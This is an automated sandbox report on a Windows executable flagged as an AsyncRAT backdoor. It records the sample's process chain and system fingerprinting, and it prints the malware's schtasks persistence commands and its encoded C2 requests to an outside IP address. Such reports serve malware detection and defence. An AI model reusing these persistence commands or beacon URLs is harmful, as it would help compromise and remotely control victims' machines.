Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 12, 2021, 6:22 p.m.	June 12, 2021, 6:33 p.m.

Size	999.7KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`3a0d3b0857330b3f4f026cb41bfad1a5`
SHA256	`204b4b167dbfff62e505a69da03fc072f6714e4578ced8e3068e15cad158e914`
CRC32	`6CBC3960`
ssdeep	`24576:U2G/nvxW3Ww0tkvdD7hJIPuy2tkshCc+i:UbA3067nqshoi`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	NPKI_Zero - File included NPKI Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen IsPE32 - (no description)

12.exe "C:\Users\test22\AppData\Local\Temp\12.exe"
7092
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\FontWinintohostNet\UWE3BhTNVatEksTFn0CppPafAWK.vbe"
  8564
  - cmd.exe cmd /c ""C:\FontWinintohostNet\u8hVPpfkR4YIk505GPamOvaaPm.bat" "
    6692
    - FontWinintohostNetrefperfsvc.exe "C:\FontWinintohostNet\FontWinintohostNetrefperfsvc.exe"
      8620
      - schtasks.exe "schtasks" /create /tn "SearchFilterHost" /sc ONLOGON /tr "'C:\Windows\System32\AxInstSv\SearchFilterHost.exe'" /rl HIGHEST /f
        5752
      - schtasks.exe "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Documents and Settings\SearchIndexer.exe'" /rl HIGHEST /f
        5260
      - schtasks.exe "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\WmiPrvSE.exe'" /rl HIGHEST /f
        6844
      - schtasks.exe "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\README\pw.exe'" /rl HIGHEST /f
        8628
      - schtasks.exe "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\LICENSE\pw.exe'" /rl HIGHEST /f
        7672
      - schtasks.exe "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons0026\taskhost.exe'" /rl HIGHEST /f
        4104
      - schtasks.exe "schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\mf3216\srvany.exe'" /rl HIGHEST /f
        7000
      - schtasks.exe "schtasks" /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f
        6652
      - schtasks.exe "schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Documents and Settings\smss.exe'" /rl HIGHEST /f
        4804
      - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\FontWinintohostNet\XB2Ym8KU2J.bat"
        9016
        
        chcp.com chcp 65001
        8936
        
        PING.EXE ping -n 5 localhost
        7496
        
        smss.exe "C:\Documents and Settings\smss.exe"
        9148

Name	Response	Post-Analysis Lookup
ipinfo.io	A 34.117.59.81	34.117.59.81

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
34.117.59.81	Active	Moloch
82.146.43.69	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49830 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.102:49830 -> 34.117.59.81:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.102:49830	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.102:49830 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	43:26:3d:5a:7e:4a:bc:f7:21:b5:d0:00:f1:49:6c:a5:bf:d1:ff:e7

Queries for the computername (26 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:22 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 12, 2021, 6:23 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 12, 2021, 6:22 p.m.			0	0
IsDebuggerPresent June 12, 2021, 6:22 p.m.			0	0
IsDebuggerPresent June 12, 2021, 6:22 p.m.			0	0
IsDebuggerPresent June 12, 2021, 6:22 p.m.			0	0

Command line console output was observed (13 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: C:\FontWinintohostNet> console_handle: 0x00000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: "C:\FontWinintohostNet\FontWinintohostNetrefperfsvc.exe" console_handle: 0x00000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "SearchFilterHost" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "SearchIndexer" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "pw" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "pw" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "taskhost" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "srvany" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "sppsvc" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: SUCCESS: The scheduled task "smss" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1
WriteConsoleW June 12, 2021, 6:22 p.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 12, 2021, 6:22 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.didat

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ June 12, 2021, 6:23 p.m.	stacktrace: 0x7fe92ec8bfa 0x7fe92ec89db 0x7fe92ec8911 0x7fe92ebdf78 mscorlib+0x4ef8a5 @ 0x7feecf9f8a5 mscorlib+0x4ef609 @ 0x7feecf9f609 mscorlib+0x4ef5c7 @ 0x7feecf9f5c7 mscorlib+0x502d21 @ 0x7feecfb2d21 CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef252f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef252f242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef252f30b NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef26f6291 DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef25d6d80 DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef25d6d0e DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef25d6c85 DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef25d6dbb NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef26f6175 StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef26666ae BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521 exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 e8 b4 df exception.instruction: cmp byte ptr [rax], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe92ec8bfa registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 8789968388960 registers.rbx: 0 registers.rsp: 479068048 registers.r11: 479062944 registers.r8: 38726452 registers.r9: 22518466294644837 registers.rdx: 38726424 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

June 12, 2021, 6:23 p.m.

stacktrace:

0x7fe92ec8bfa
0x7fe92ec89db
0x7fe92ec8911
0x7fe92ebdf78
mscorlib+0x4ef8a5 @ 0x7feecf9f8a5
mscorlib+0x4ef609 @ 0x7feecf9f609
mscorlib+0x4ef5c7 @ 0x7feecf9f5c7
mscorlib+0x502d21 @ 0x7feecfb2d21
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef252f713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef252f242
CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef252f30b
NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef26f6291
DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef25d6d80
DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef25d6d0e
DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef25d6c85
DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef25d6dbb
NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef26f6175
StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef26666ae
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521

exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 e8 b4 df
exception.instruction: cmp byte ptr [rax], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fe92ec8bfa
registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 8789968388960
registers.rbx: 0
registers.rsp: 479068048
registers.r11: 479062944
registers.r8: 38726452
registers.r9: 22518466294644837
registers.rdx: 38726424
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://82.146.43.69/externalpython_Processorgame.php?LvrQDfqaLdLHF9eQd39S=HlNgKSQ&024460c38d1a807278c8431ced0b0904=4b7440ed015fe8fe3058245b94b19e91&fc3c3634ae1d8921db8402bb95b1565b=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&LvrQDfqaLdLHF9eQd39S=HlNgKSQ
suspicious_features	Connection to IP address				suspicious_request	GET http://82.146.43.69/externalpython_Processorgame.php?LvrQDfqaLdLHF9eQd39S=HlNgKSQ&bb3ddb2219372e793395286708ab7007=gM4UWNmFGZwgjN2AjNyQWMwQmZyITOzkzNxEDN2QzYiZDZ5ADOkhDZyEDNykjM1ITOzQDNyczM&fc3c3634ae1d8921db8402bb95b1565b=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&cd8054709f69449745e1d9b91abbd92e=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W&c7b940f6c4fda35f1571cd148ec3856b=d1nIiojI1UjYkljZidzMlZjYwYWNzUDO3YzYwIjYyITNmJ2N5EmIsIyYhRjY4cjZ0M2M0IGO2EGMycTN1QDMiVWZiNDZ1YzMlV2N0U2N0MjZiojIidzY2QGOkVWMzETNjFTMhJGO2ITY1EWOlNTOzIjYjdjIsICNwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjNiojIycTMxcTOkhzMzMTO2U2N4QzMxMjZ5czN4U2N4QmNygjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0QhBjVYllb1cVY65EWhRXODhlds1GT2pVbiBnQYFmd3FDTjBnejdnUIR2bKl2TpV1VitmRXpVeKNETpd3VkZnVyUld3ZVWw5EWRl2bqlEb1IjY2Y1ViBnUul0cJlmT0UkeNdXSp9Ua3dVWw40MidnSDxUawIjYqZ1RixmUGlEaW12Y2RXRJJTW65EMNZVUp9maJ5mSzIWa3lWSwcmeOVDNp5UeFRET3llaOFDN55keJl2Tp1kMiNnSDxUaJFzUp9maJVjSIRWdWNjYqp0QMl2dXRmdWJTVp9maJVXOXFmbW12YpdXaJNnVzIGbOxWS2k0UlBDbykVa3lWS3VFVNVXU61Ee0M0T3lkaMFzYU1UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeJREZ6Z1Rkl2bqlEbxcVWPpEWapnVsl0cJlXURFTaNlXUxUlRSxWS2k0UaRnRtRFRCxWSzl0QNVXSqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUTNiRWOmJ2NzUmNiBjZ1MTN4cjNjBjMiJjM1YmY3kTYiwiIhdDM1E2M5ITOmN2YxQTZzQjZ5U2MzYjZwUTNzU2NlBTYjNTM2MGNzIiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W

Performs some HTTP requests (3 events)

request	GET http://82.146.43.69/externalpython_Processorgame.php?LvrQDfqaLdLHF9eQd39S=HlNgKSQ&024460c38d1a807278c8431ced0b0904=4b7440ed015fe8fe3058245b94b19e91&fc3c3634ae1d8921db8402bb95b1565b=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&LvrQDfqaLdLHF9eQd39S=HlNgKSQ
request	GET http://82.146.43.69/externalpython_Processorgame.php?LvrQDfqaLdLHF9eQd39S=HlNgKSQ&bb3ddb2219372e793395286708ab7007=gM4UWNmFGZwgjN2AjNyQWMwQmZyITOzkzNxEDN2QzYiZDZ5ADOkhDZyEDNykjM1ITOzQDNyczM&fc3c3634ae1d8921db8402bb95b1565b=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&cd8054709f69449745e1d9b91abbd92e=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W&c7b940f6c4fda35f1571cd148ec3856b=d1nIiojI1UjYkljZidzMlZjYwYWNzUDO3YzYwIjYyITNmJ2N5EmIsIyYhRjY4cjZ0M2M0IGO2EGMycTN1QDMiVWZiNDZ1YzMlV2N0U2N0MjZiojIidzY2QGOkVWMzETNjFTMhJGO2ITY1EWOlNTOzIjYjdjIsICNwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjNiojIycTMxcTOkhzMzMTO2U2N4QzMxMjZ5czN4U2N4QmNygjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0QhBjVYllb1cVY65EWhRXODhlds1GT2pVbiBnQYFmd3FDTjBnejdnUIR2bKl2TpV1VitmRXpVeKNETpd3VkZnVyUld3ZVWw5EWRl2bqlEb1IjY2Y1ViBnUul0cJlmT0UkeNdXSp9Ua3dVWw40MidnSDxUawIjYqZ1RixmUGlEaW12Y2RXRJJTW65EMNZVUp9maJ5mSzIWa3lWSwcmeOVDNp5UeFRET3llaOFDN55keJl2Tp1kMiNnSDxUaJFzUp9maJVjSIRWdWNjYqp0QMl2dXRmdWJTVp9maJVXOXFmbW12YpdXaJNnVzIGbOxWS2k0UlBDbykVa3lWS3VFVNVXU61Ee0M0T3lkaMFzYU1UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeJREZ6Z1Rkl2bqlEbxcVWPpEWapnVsl0cJlXURFTaNlXUxUlRSxWS2k0UaRnRtRFRCxWSzl0QNVXSqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUTNiRWOmJ2NzUmNiBjZ1MTN4cjNjBjMiJjM1YmY3kTYiwiIhdDM1E2M5ITOmN2YxQTZzQjZ5U2MzYjZwUTNzU2NlBTYjNTM2MGNzIiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W
request	GET https://ipinfo.io/json

Allocates read-write-execute memory (usually to unpack itself) (50 out of 198 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 7092 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2401000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2a9b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002380000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002510000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
